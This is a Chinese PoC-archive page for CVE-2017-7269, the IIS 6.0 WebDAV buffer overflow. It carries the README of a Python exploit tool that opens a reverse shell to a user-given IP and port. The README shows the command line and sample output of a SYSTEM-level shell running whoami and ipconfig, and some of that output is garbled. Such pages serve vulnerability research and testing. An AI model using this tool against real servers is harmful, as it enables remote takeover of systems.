关联漏洞
标题:
Microsoft Internet Information Services 缓冲区错误漏洞
(CVE-2017-7269)
描述:Microsoft Windows Server 2003 R2是美国微软(Microsoft)公司发布的一套服务器操作系统。Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDAV服务的‘ScStoragePathFromUrl’函数存在缓冲区溢出漏洞。远程攻击者可通过发送特制的PROPFIND请求利用该漏洞执行任意代码。
描述
CVE-2017-7269
介绍
# EN
**GenWebDavIISExploit** is a PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.
## Disclaimer
This project is intended for **educational purposes only**. Use this tool responsibly and only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
## Features
- Remote code execution on vulnerable IIS6 WebDAV servers.
- Dynamic payload generation with user-specified reverse IP and port.
- Easy-to-use command-line interface for rapid exploitation.
## Prerequisites
- **Python 3.x**: Ensure that Python 3 is installed on your system.
- **Network Access**: Ability to connect to the target machine's IP and port.
## Usage
### Command-Line Arguments
- **Target IP**: The IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address where the reverse shell should connect.
- **Reverse Port**: The port number on your system to receive the reverse shell.
## Example
```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```
## Usage Example
```bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```
## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...
[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Received a connection back from 192.168.1.10:12345
[+] Remote access successfully established!
C:Windows\Windows\system32> whoami
nt authority\system
C:\Windows/system32> ipconfig
Windows IP Configuration
Ethernet Local Area Connection adapter:
DNS-127.00.1 . . . . . . . : example.local
IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
Subnet mask . . . . . . . . . . . . . . . . : 255.255.255.0
Main gateway . . . . . . . . . . . . . . . . : 192.168.1.1
```
## Notes
- Ensure you have a listener running on the specified reverse port to capture the incoming reverse shell.
- Use this tool only on authorized systems to test for vulnerabilities.
# RU
**GenWebDavIISExploit** is a PoC tool that demonstrates exploitation of a known vulnerability in the WebDAV component on IIS6. This tool is created for educational and research purposes to show how the vulnerability can be exploited to execute arbitrary code on a remote server.
Translated with DeepL.com (free version)
## Disclaimer
This project is intended **for educational purposes only**. Use this tool responsibly and only on systems that you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
## Features
- Execution of remote code on vulnerable IIS6 WebDAV servers.
- Dynamic payload code generation with IP and port specification for the reverse connection.
- Simple command line interface for quick use.
## Requirements
- **Python 3.x**: Make sure you have Python 3 installed.
- **Network Access**: Ability to connect to the target machine's IP address and port.
## Usage
### Command line arguments
- **Target IP**: IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address to which the reverse connection should be established.
- **Reverse Port**: The port number on your system to receive the reverse connection.
## Example
```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```
## Example usage
````bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```
## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...
Translated with DeepL.com (free version)
[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Received back connection from 192.168.1.10:12345
[+] Remote access successfully established!
C:Windows\Windows\system32> whoami
nt authority\system
C:\Windows/system32> ipconfig
Windows IP Configuration
Ethernet Local Area Connection adapter:
DNS connection suffix . . . . . . . : example.local
IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . . . . . . . . : 192.168.1.1
```
## Notes
- Make sure you have a listener running on the specified reverse port to intercept the incoming reverse connection.
- Use this tool only on authorized systems to check for vulnerabilities.
文件快照
[4.0K] /data/pocs/100479bf52034f6788e657496f2755b9724b5f14
├── [ 15K] GenWebDavIISExploit.py
├── [1.0K] LICENSE
└── [5.2K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。